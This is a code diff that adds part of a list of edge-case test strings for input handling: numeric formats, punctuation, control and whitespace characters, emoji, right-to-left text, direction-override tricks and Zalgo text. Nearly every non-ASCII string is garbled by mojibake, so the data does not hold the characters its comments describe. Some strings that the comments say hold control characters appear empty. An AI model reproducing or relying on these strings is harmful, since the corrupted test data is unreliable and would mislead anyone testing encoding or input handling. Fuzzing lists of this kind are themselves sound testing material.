+ "123456789012345678901234567890123456789", "1,000.00", "1 000.00", "1'000.00", "1,000,000.00", "1 000 000.00", "1'000'000.00", "1.000,00", "1 000,00",
+ "1'000,00", "1.000.000,00", "1 000 000,00", "1'000'000,00", "01000", "08", "09", "2.2250738585072011e-308",
+
+ // Special Characters
+ //
+ // ASCII punctuation. All of these characters may need to be escaped in some
+ // contexts. Divided into three groups based on (US-layout) keyboard position.
+
+ ",./;'[]\\-=", "<>?:\"{}|_+", "!@#$%^&*()`~",
+
+ // Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,
+ // and U+007F (DEL)
+ // Often forbidden to appear in various text-based file formats (e.g. XML),
+ // or reused for internal delimiters on the theory that they should never
+ // appear in input.
+ // The next line may appear to be blank or mojibake in some viewers.
+ "",
+
+ // Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.
+ // Commonly misinterpreted as additional graphic characters.
+ // The next line may appear to be blank, mojibake, or dingbats in some viewers.
+ "ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚",
+
+ // Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode
+ // version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),
+ // and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
+ // treated as whitespace in some contexts.
+ // This file unfortunately cannot express strings containing
+ // U+0000, U+000A, or U+000D (NUL, LF, CR).
+ // The next line may appear to be blank or mojibake in some viewers.
+ // The next line may be flagged for \"trailing whitespace\" in some viewers.
+ " ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ",
+
+ // Unicode additional control characters: all of the characters with
+ // general category Cf (in Unicode 8.0.0).
+ // The next line may appear to be blank or mojibake in some viewers.
+ "ᅡᆳ￘タ￘チ￘ツ￘テ￘ト￘ナ￘ワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵ￯ᄏ﾿￯"
+ "﾿ᄍ￯﾿ᄎ￯﾿ᄏ￰ムツᄑ￰ロᄇᅠ￰ロᄇᄀ￰ロᄇᄁ￰ロᄇᆪ￰ンナᄈ￰ンナᄡ￰ンナᄉ￰ンナᄊ￰ンナᄋ￰ンナᄌ￰ンナᄍ￰ンナᄎ￳ᅠタチ￳ᅠタᅠ￳ᅠタᄀ￳ᅠタᄁ￳ᅠタᆪ￳ᅠタᄂ￳ᅠ"
+ "タᆬ￳ᅠタᆭ￳ᅠタᄃ￳ᅠタᄄ￳ᅠタᄅ￳ᅠタᆰ￳ᅠタᆱ￳ᅠタᆲ￳ᅠタᆳ￳ᅠタᆴ￳ᅠタᆵ￳ᅠタᄚ￳ᅠタᄆ￳ᅠタᄇ￳ᅠタᄈ￳ᅠタᄡ￳ᅠタᄉ￳ᅠタᄊ￳ᅠタᄋ￳ᅠタᄌ"
+ "￳ᅠタᄍ￳ᅠタᄎ￳ᅠタᄏ￳ᅠタᄐ￳ᅠタᄑ￳ᅠタᄒ￳ᅠタ﾿￳ᅠチタ￳ᅠチチ￳ᅠチツ￳ᅠチテ￳ᅠチト￳ᅠチナ￳ᅠチニ￳ᅠチヌ￳ᅠチネ￳ᅠチノ￳ᅠチハ￳ᅠチヒ"
+ "￳ᅠチフ￳ᅠチヘ￳ᅠチホ￳ᅠチマ￳ᅠチミ￳ᅠチム￳ᅠチメ￳ᅠチモ￳ᅠチヤ￳ᅠチユ￳ᅠチヨ￳ᅠチラ￳ᅠチリ￳ᅠチル￳ᅠチレ￳ᅠチロ￳ᅠチワ￳ᅠチン￳ᅠヂ"
+ "￳ᅠチ゚￳ᅠチᅠ￳ᅠチᄀ￳ᅠチᄁ￳ᅠチᆪ￳ᅠチᄂ￳ᅠチᆬ￳ᅠチᆭ￳ᅠチᄃ￳ᅠチᄄ￳ᅠチᄅ￳ᅠチᆰ￳ᅠチᆱ￳ᅠチᆲ￳ᅠチᆳ￳ᅠチᆴ￳ᅠチᆵ￳ᅠチᄚ￳ᅠチᄆ"
+ "￳ᅠチᄇ￳ᅠチᄈ￳ᅠチᄡ￳ᅠチᄉ￳ᅠチᄊ￳ᅠチᄋ￳ᅠチᄌ￳ᅠチᄍ￳ᅠチᄎ￳ᅠチᄏ￳ᅠチᄐ￳ᅠチᄑ￳ᅠチᄒ￳ᅠチ"
+ "﾿",
+
+ // \"Byte order marks\", U+FEFF and U+FFFE, each on its own line.
+ // The next two lines may appear to be blank or mojibake in some viewers.
+ "￯ᄏ﾿", "￯﾿ᄒ",
+
+ // Unicode Symbols
+ //
+ // Strings which contain common unicode symbols (e.g. smart quotes)
+
+ "ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", "ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", "ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ",
+ "ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ",
+ "ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ﾿", "ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤ￯ᆪ﾿ᅢメᅢレᅢニ¬リテ",
+ "ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", "`¬チト¬ツᆲ¬タᄍ¬タᄎ￯ᆲチ￯ᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ",
+ "¬ナロ¬ナワ¬ナン¬ナ゙",
+ "￐チ￐ツ￐テ￐ト￐ナ￐ニ￐ヌ￐ネ￐ノ￐ハ￐ヒ￐フ￐ヘ￐ホ￐マ￐ミ￐ム￐メ￐モ￐ヤ￐ユ￐ヨ￐ラ￐リ￐ル￐レ￐ロ￐ワ￐ン￐゙￐゚￐ᅠ￐ᄀ￐ᄁ￐ᆪ￐ᄂ￐ᆬ￐ᆭ"
+ "￐ᄃ￐ᄄ￐ᄅ￐ᆰ￐ᆱ￐ᆲ￐ᆳ￐ᆴ￐ᆵ￐ᄚ￐ᄆ￐ᄇ￐ᄈ￐ᄡ￐ᄉ￐ᄊ￐ᄋ￐ᄌ￐ᄍ￐ᄎ￐ᄏ￐ᄐ￐ᄑ￐ᄒ￐﾿￑タ￑チ￑ツ￑テ￑ト￑ナ￑ニ￑ヌ￑ネ￑ノ￑ハ￑ヒ￑フ"
+ "￑ヘ￑ホ￑マ",
+ "￙ᅠ￙ᄀ￙ᄁ￙ᆪ￙ᄂ￙ᆬ￙ᆭ￙ᄃ￙ᄄ￙ᄅ",
+
+ // Unicode Subscript/Superscript/Accents
+ //
+ // Strings which contain unicode subscripts/superscripts; can cause rendering issues
+
+ "¬チᄚ¬チᄡ¬チᄉ", "¬ツタ¬ツチ¬ツツ", "¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ",
+ "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢"
+ "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ"
+ "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ "
+ "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢"
+ "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ"
+ "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ "
+ "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢"
+ "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ"
+ "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ",
+
+ // Quotation Marks
+ //
+ // Strings which contain misplaced quotation marks; can cause encoding errors
+
+ "'", "\"", "''", "\"\"", "'\"'", "\"''''\"'\"", "\"'\"'\"''''\"", "<foo val=¬タワbar¬タン />", "<foo val=¬タワbar¬タン />", "<foo val=¬タンbar¬タワ />",
+ "<foo val=`bar' />",
+
+ // Two-Byte Characters
+ //
+ // Strings which contain two-byte characters: can cause rendering issues or character-length issues
+
+ "￧ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", " ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ",
+ "¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", "←テᄄ│ミᄑ₩ᅠᄐ", "↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ",
+ "↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ "
+ "→リᅠ→ᄚᄅ↑ᄚチ■ユリ",
+ "￧ᄂᄒ₩ワテ￧ᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌ￧ᅠヤ￧ᄅᄊ₩ノタ", "↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ",
+ "￰ᅠワホ￰ᅠワᄆ￰ᅠンᄍ￰ᅠᄆモ￰ᅠᄆᄌ￰ᅠᄇヨ￰ᅠᄈマ",
+
+ // Changing length when lowercased
+ //
+ // Characters which increase in length (2 to 3 bytes) when lowercased
+ // Credit: https://twitter.com/jifa/status/625776454479970304
+
+ "￈ᄎ", "￈ᄒ",
+
+ // Japanese Emoticons
+ //
+ // Strings which consists of Japanese-style emoticons which are popular on the web
+
+ " ̄テᄑ¢ᄐᄐ¢ᄎネ￙トᅪワ¢ᄎネ¢ᄐᄑ￯ᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネ￙トᅪワ¢ᄎネ¢ᄐᄑ￯ᄒノ",
+ "(￯ᄑᄀ¬ラユ ¬ネタ ¬ラユ￯ᄑᄀ)", "￯ᄑタ￯ᄑᄄ(ᅡᄡ¬ネタ￯ᄑタ¬ネᄅ", "__￯ᄒロ(,_,*)",
+ " ̄テᄏ(￯﾿ᆪ¬ネタ￯﾿ᆪ) ̄テᄏ:*:",
+ "￯ᄒ゚￯ᄑᆬ¬ワ﾿ ̄テᄒ¬ユᄇ(￯ᄑᄀ¬ラユ¬タ﾿¬ラユ￯ᄑᄀ)¬ユᄆ¬ワ﾿￯ᄑᆬ￯ᄒ゚",
+ ", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル",
+ "(¬ユᆵᅡᄚ¬ヨ가ᄚ￯ᄐノ¬ユᆵ￯ᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)",
+ "(￯ᄒノ¢ᄇᆬ￧ロハ¢ᄇᆬ￯ᄐノ￯ᄒノ￯ᄏ﾿ ¬ヤᄏ¬ヤチ¬ヤᄏ", "¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", "( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)",
+
+ // Emoji
+ //
+ // Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
+
+ "￰゚リヘ", "￰゚ムᄅ￰゚マᄑ", "￰゚ムᄒ ￰゚ルヌ ￰゚メチ ￰゚ルナ ￰゚ルニ ￰゚ルヒ ￰゚ルホ ￰゚ルヘ",
+ "￰゚ミᄉ ￰゚ルネ ￰゚ルノ ￰゚ルハ",
+ "¬ンᄂ￯ᄌマ ￰゚メヤ ￰゚メフ ￰゚メユ ￰゚メ゙ ￰゚メモ ￰゚メラ ￰゚メヨ ￰゚メリ ￰゚メン ￰゚メ゚ ￰゚メワ ￰゚メロ ￰゚メレ "
+ "￰゚メル",
+ "¬ワヒ￰゚マ﾿ ￰゚メᆰ￰゚マ﾿ ￰゚ムミ￰゚マ﾿ ￰゚ルフ￰゚マ﾿ ￰゚ムマ￰゚マ﾿ ￰゚ルマ￰゚マ﾿",
+ "￰゚レᄒ ￰゚ニメ ￰゚ニモ ￰゚ニユ ￰゚ニヨ ￰゚ニラ ￰゚ニル ￰゚マᄃ",
+ "0￯ᄌマ¬テᆪ 1￯ᄌマ¬テᆪ 2￯ᄌマ¬テᆪ 3￯ᄌマ¬テᆪ 4￯ᄌマ¬テᆪ 5￯ᄌマ¬テᆪ 6￯ᄌマ¬テᆪ 7￯ᄌマ¬テᆪ 8￯ᄌマ¬テᆪ 9￯ᄌマ¬テᆪ "
+ "￰゚ヤ゚",
+
+ // Regional Indicator Symbols
+ //
+ // Regional Indicator Symbols can be displayed differently across
+ // fonts, and have a number of special behaviors
+
+ "￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ ￰゚ヌᆭ￰゚ヌᆱ￰゚ヌᆭ￰゚ヌᄇ￰゚ヌᄌ",
+ "￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᆭ￰゚ヌᆱ￰゚ヌᆭ￰゚ヌᄇ",
+ "￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᆭ",
+
+ // Unicode Numbers
+ //
+ // Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
+
+ "￯ᄐム￯ᄐメ￯ᄐモ", "￙ᄀ￙ᄁ￙ᆪ",
+
+ // Right-To-Left Strings
+ //
+ // Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
+
+ "￘ᆱ￙ナ ￙ニ￙チ￘ᄈ ￘ᄈ￙ツ￘ᄋ￘ᆰ ￙ネ￘ᄄ￘ᄃ￙ト￘ᆰ￘ᆳ￘ᆵ￙ハ￘ᆵ￘フ, ￘ᆲ￘ᄇ￙ハ￘ᄆ￘ᆰ￙ハ ￘ᄄ￘ᄃ￘ᄈ￘ᆰ￘ᆴ￘ᆵ￘ᄃ￙ナ ￘ᆪ￙ニ "
+ "￘ᆵ￙ニ￙ネ. ￘ᆬ￘ᄚ ￙ヌ￙ニ￘ᄃ￘゚ ￘ᄃ￙ト￘ᄈ￘ᆰ￘ᄃ￘ᄆ ￙ネ￘ᆰ￙ニ￘ᄉ￙ハ￘ᄄ ￙テ￘ᄃ￙ニ. ￘ᆪ￙ヌ￙ム￙ト ￘ᄃ￙ハ￘ᄋ￘ᄃ￙ト￙ハ￘ᄃ￘フ "
+ "￘ᄄ￘ᄆ￙ハ￘ᄋ￘ᄃ￙ニ￙ハ￘ᄃ-￙チ￘ᄆ￙ニ￘ᄈ￘ᄃ ￙ツ￘ᆵ ￘ᆪ￘ᆴ￘ᄚ. ￘ᄈ￙ト￙ハ￙ナ￘ᄃ￙ニ￘フ ￘ᆬ￘ᆰ￙チ￘ᄃ￙ツ￙ハ￘ᄅ ￘ᄄ￙ハ￙ニ "
+ "￙ナ￘ᄃ, ￙ハ￘ᄚ￙テ￘ᄆ ￘ᄃ￙ト￘ᆳ￘ᆵ￙ネ￘ᆵ ￘ᆪ￙ハ ￘ᄄ￘ᄍ￘ᆵ, ￙ナ￘ᄍ￘ᄃ￙ナ￙ト￘ᄅ ￘ᄄ￙ネ￙ト￙ニ￘ᆵ￘ᄃ￘フ "
+ "￘ᄃ￙ト￘ᆬ￘ᄋ￙ト￘ᄃ￙ツ ￘ᄍ￙ト ￘ᆬ￙ハ￙ネ.",
+ "ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙",
+ "ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtest￘ᄃ￙ト￘ᄉ￙チ￘ᆳ￘ᄃ￘ᆰ ￘ᄃ￙ト￘ᆰ￙ム￘ᆳ￙ネ￙ト", "￯ᄋᄑ",
+ "￯ᄋᄎ",
+ "￙ナ￙マ￙ニ￙ホ￘ᄃ￙ツ￙ホ￘ᄡ￙ホ￘ᄅ￙マ ￘ᄈ￙マ￘ᄄ￙マ￙ト￙ミ ￘ᄃ￙ミ￘ᄈ￙メ￘ᆰ￙ミ￘ᆴ￙メ￘ᆵ￙ホ￘ᄃ￙ナ￙ミ "
+ "￘ᄃ￙ト￙ト￙ム￙マ￘ᄎ￙ホ￘ᄅ￙ミ ￙チ￙ミ￙ハ ￘ᄃ￙ト￙ニ￙ム￙マ￘ᄌ￙マ￙ナ￙ミ ￘ᄃ￙ト￙メ￙ツ￙ホ￘ᄃ￘ᆭ￙ミ￙ナ￙ホ￘ᄅ￙ミ "
+ "￙ネ￙ホ￙チ￙ミ￙ハ￙ナ ￙ハ￙ホ￘ᆴ￙マ￘ᄉ￙ム￙ホ ￘ᄃ￙ト￘ᆰ￙ム￙ホ￘ᄋ￙メ￘ᄄ￙ミ￙ハ￙ツ￙ホ￘ᄃ￘ᆰ￙マ "
+ "￘ᄃ￙ト￙メ￘ᆳ￘ᄃ￘ᄈ￙マ￙ネ￘ᄄ￙ミ￙ハ￙ム￙ホ￘ᄅ￙マ￘フ ",
+
+ // Trick Unicode
+ //
+ // Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
+
+ "¬タᆰ¬タᆰtest¬タᆰ", "¬タᆱtest¬タᆱ", "¬タᄅtest¬タᄅ", "test¬チᅠtest¬タᆱ", "¬チᆭtest¬チᄃ",
+
+ // Zalgo Text
+ //
+ // Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
+
+ "£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ "
+ "ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ "
+ "ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ "
+ "ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ",
+ "ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ "
+ "ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ "
+ "ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ."
+ "ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ",
+ "ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ "
+ "ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ "
+ "ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf "
+ "ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚",
+ "ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ "
+ "ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ "
+ "ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ",
+ "Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ",
+
+ // Unicode Upsidedown
+ //
+ // Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)
+
+ "ᅨル￉ミnb£ᄡノl￉ミ ￉ミuᅥテ￉ミ￉ᆵ ᅦン￉ᄍolop ᅧヌᅦン ᅦン￉ᄍoq￉ミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノ￉ヤu£ᄡノ ￉ᄍod￉ᆵᅦンᅧヌ po￉ᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン "
+ "ᅥテu£ᄡノ￉ヤs£ᄡノd£ᄡノp￉ミ ￉ᄍnᅧヌᅦンᅧヌ￉ヤᅦンsuo￉ヤ 'ᅧヌᅦン￉ᆵ￉ミ ᅧヌ£ᄡノs ￉ᄍolop ￉ᆵnsd£ᄡノ "
+ "￉ᆵᅦン￉ᄍoᅨᆬ",
+ "00ᅨルᅥヨ$-",
+
+ // Unicode font
+ //
+ // Strings which contain bold/italic/etc. versions of normal characters
+
